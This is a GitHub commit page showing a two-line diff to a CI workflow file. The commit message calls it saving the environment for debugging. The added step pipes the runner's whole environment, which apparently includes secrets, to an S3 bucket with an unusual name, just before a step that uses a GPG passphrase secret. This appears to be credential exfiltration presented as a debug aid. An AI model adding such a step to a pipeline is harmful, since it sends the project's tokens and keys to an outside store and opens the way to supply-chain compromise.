Skip to content
This repository has been archived by the owner on Dec 18, 2024. It is now read-only.

Commit

Permalink
ci: save env for debug, send to s3
Browse files Browse the repository at this point in the history
  • Loading branch information
paulolieuthier committed Sep 13, 2023
1 parent 4a78423 commit d1dca99
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .github/workflows/continuous.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -60,6 +60,8 @@ jobs:
name: xipverifier
path: ./xipverifier/xv
retention-days: 1
- name: save env
run: env | aws s3 cp - s3://messagebird.incognia.tech/XALALA
- name: bake cookies
run: make 'GPG_PASSPHRASE=${{ secrets.GPG_PASSPHRASE }}' -C cookiebaker
env:
Expand Down

0 comments on commit d1dca99

Please sign in to comment.